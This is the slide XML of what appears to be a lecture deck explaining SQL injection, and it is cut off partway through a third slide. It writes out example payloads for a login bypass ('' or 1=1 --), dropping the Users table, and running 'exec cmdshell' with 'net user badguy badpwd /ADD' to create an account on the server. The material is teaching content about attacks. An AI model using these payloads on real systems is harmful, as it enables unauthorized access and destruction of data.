            <a:off x="2847975" y="4525963"/>
            <a:ext cx="3052763" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Normal Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4386263" y="3449817"/>
            <a:ext cx="3025774"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0800000">
            <a:off x="4386264" y="3808412"/>
            <a:ext cx="3059111" cy="1588"/>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76800" y="3200400"/>
            <a:ext cx="2438400" cy="422694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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
        <p:nvSpPr>
          <p:cNvPr id="1304578" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bad input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1304579" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose    user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(URL encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then scripts does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ok = execute( SELECT … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>			WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>or 1=1  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> … )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  causes rest of line to be ignored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Now  ok.EOF   is always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>false and login succeeds.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The bad news:    easy login to many sites this way.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{847A6432-2AF4-4D50-9537-3B972F0DB613}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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0" y="3996906"/>
            <a:ext cx="4114800" cy="422694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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
        <p:nvSpPr>
          <p:cNvPr id="1305602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Even worse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305603" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="8610600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose user = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ;  DROP TABLE  Users  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then script does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ok = execute( SELECT … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHERE user= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>; DROP TABLE Users  …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Deletes user table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Similarly:   attacker can add users,  reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,  etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{05D07F75-139E-4502-A23C-6822D349B884}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>worse …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1305603" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="8001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose user = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>			′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>badpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/ ADD --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then script does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ok = execute( SELECT … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>			WHERE username= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
